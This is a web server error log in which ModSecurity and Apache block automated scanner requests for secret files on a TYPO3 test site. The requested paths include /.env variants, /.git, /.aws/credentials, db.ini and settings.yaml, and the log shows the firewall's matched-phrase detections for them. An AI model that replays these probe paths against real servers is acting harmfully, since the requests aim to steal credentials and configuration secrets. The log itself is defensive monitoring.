[Tue Apr 08 19:51:39.375452 2025] [:error] [pid 2347174] [client 69.163.177.103:35748] [client 69.163.177.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_ViK2Wqok4rpUSPaF9IdwAAAAs"]
[Tue Apr 08 19:51:39.375628 2025] [:error] [pid 2347174] [client 69.163.177.103:35748] [client 69.163.177.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_ViK2Wqok4rpUSPaF9IdwAAAAs"]
[Wed Apr 09 21:27:11.361260 2025] [:error] [pid 2358230] [client 69.163.177.103:59922] [client 69.163.177.103] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_bKD4ovlISdKFyV5CcBtQAAAAg"]
[Wed Apr 09 21:27:11.361537 2025] [:error] [pid 2358230] [client 69.163.177.103:59922] [client 69.163.177.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_bKD4ovlISdKFyV5CcBtQAAAAg"]
[Wed Apr 09 21:27:11.361703 2025] [:error] [pid 2358230] [client 69.163.177.103:59922] [client 69.163.177.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_bKD4ovlISdKFyV5CcBtQAAAAg"]
[Fri Apr 11 12:06:06.062639 2025] [:error] [pid 2401220] [client 69.163.176.23:45632] [client 69.163.176.23] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_jpjh5NuTOV_ufJOTpqFgAAAAI"]
[Fri Apr 11 12:06:06.064184 2025] [:error] [pid 2401220] [client 69.163.176.23:45632] [client 69.163.176.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_jpjh5NuTOV_ufJOTpqFgAAAAI"]
[Fri Apr 11 12:06:06.064394 2025] [:error] [pid 2401220] [client 69.163.176.23:45632] [client 69.163.176.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_jpjh5NuTOV_ufJOTpqFgAAAAI"]
[Fri Apr 18 03:17:46.442974 2025] [authz_core:error] [pid 2553178] [client 45.130.203.196:39777] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Apr 20 12:05:26.480214 2025] [:error] [pid 2597531] [client 45.130.203.229:1121] [client 45.130.203.229] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5ivq4uit1rpTjEgR7AAAAAI"]
[Sun Apr 20 12:05:26.481473 2025] [:error] [pid 2597531] [client 45.130.203.229:1121] [client 45.130.203.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5ivq4uit1rpTjEgR7AAAAAI"]
[Sun Apr 20 12:05:26.481649 2025] [:error] [pid 2597531] [client 45.130.203.229:1121] [client 45.130.203.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5ivq4uit1rpTjEgR7AAAAAI"]
[Sun Apr 20 12:05:26.590082 2025] [:error] [pid 2599010] [client 45.130.203.227:1127] [client 45.130.203.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5nNuewUkVloE_4FchwAAAA0"]
[Sun Apr 20 12:05:26.590446 2025] [:error] [pid 2599010] [client 45.130.203.227:1127] [client 45.130.203.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5nNuewUkVloE_4FchwAAAA0"]
[Sun Apr 20 12:05:26.590617 2025] [:error] [pid 2599010] [client 45.130.203.227:1127] [client 45.130.203.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aATG5nNuewUkVloE_4FchwAAAA0"]
[Mon Apr 21 00:35:22.436978 2025] [authz_core:error] [pid 2615364] [client 93.123.109.75:63413] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Apr 21 22:04:00.805384 2025] [authz_core:error] [pid 2618015] [client 89.248.165.51:60360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 22 09:55:20.742278 2025] [authz_core:error] [pid 2644857] [client 93.123.109.108:61489] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Apr 24 09:17:03.754012 2025] [authz_core:error] [pid 2695522] [client 79.124.58.138:15261] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Apr 24 11:12:12.866838 2025] [authz_core:error] [pid 2695498] [client 93.123.109.77:53411] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Apr 24 17:24:16.832180 2025] [authz_core:error] [pid 2695522] [client 93.123.109.108:58462] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Apr 25 11:15:18.169738 2025] [authz_core:error] [pid 2716917] [client 93.123.109.107:49367] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Apr 28 14:53:34.056030 2025] [authz_core:error] [pid 2791471] [client 93.123.109.105:47686] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Apr 28 18:25:03.453937 2025] [authz_core:error] [pid 2790044] [client 93.123.109.105:49696] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Apr 28 23:47:11.203805 2025] [authz_core:error] [pid 2782388] [client 93.123.109.105:48454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 29 04:28:41.369028 2025] [authz_core:error] [pid 2802794] [client 93.123.109.7:41430] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 29 05:08:11.682154 2025] [:error] [pid 2802794] [client 45.148.10.172:44792] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBBCmwqSJC1NA8iou9vXjQAAAAA"]
[Tue Apr 29 05:08:11.682454 2025] [:error] [pid 2802794] [client 45.148.10.172:44792] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBBCmwqSJC1NA8iou9vXjQAAAAA"]
[Tue Apr 29 05:08:11.682648 2025] [:error] [pid 2802794] [client 45.148.10.172:44792] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBBCmwqSJC1NA8iou9vXjQAAAAA"]
[Thu May 01 14:34:27.567333 2025] [authz_core:error] [pid 2847662] [client 93.123.109.108:64777] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 11 04:16:10.562991 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCAIavYfJEmc7rpKGbevLAAAAAQ"]
[Sun May 11 04:16:10.566279 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCAIavYfJEmc7rpKGbevLAAAAAQ"]
[Sun May 11 04:16:10.566531 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCAIavYfJEmc7rpKGbevLAAAAAQ"]
[Sun May 11 04:16:15.260371 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLQAAAAQ"]
[Sun May 11 04:16:15.260615 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLQAAAAQ"]
[Sun May 11 04:16:15.260794 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLQAAAAQ"]
[Sun May 11 04:16:15.449879 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCAIb_YfJEmc7rpKGbevLgAAAAQ"]
[Sun May 11 04:16:15.450180 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCAIb_YfJEmc7rpKGbevLgAAAAQ"]
[Sun May 11 04:16:15.450483 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCAIb_YfJEmc7rpKGbevLgAAAAQ"]
[Sun May 11 04:16:15.594204 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLwAAAAQ"]
[Sun May 11 04:16:15.594501 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLwAAAAQ"]
[Sun May 11 04:16:15.594716 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevLwAAAAQ"]
[Sun May 11 04:16:15.620805 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevMAAAAAQ"]
[Sun May 11 04:16:15.621072 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevMAAAAAQ"]
[Sun May 11 04:16:15.621274 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCAIb_YfJEmc7rpKGbevMAAAAAQ"]
[Sun May 11 04:16:15.926665 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Sun May 11 04:16:15.960796 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun May 11 04:16:16.124913 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
[Sun May 11 04:16:16.196347 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCAIcPYfJEmc7rpKGbevOAAAAAQ"]
[Sun May 11 04:16:16.196622 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCAIcPYfJEmc7rpKGbevOAAAAAQ"]
[Sun May 11 04:16:16.196798 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCAIcPYfJEmc7rpKGbevOAAAAAQ"]
[Sun May 11 04:16:16.427686 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun May 11 04:16:16.457720 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Sun May 11 04:16:16.522671 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Sun May 11 04:16:16.545371 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCAIcPYfJEmc7rpKGbevQgAAAAQ"]
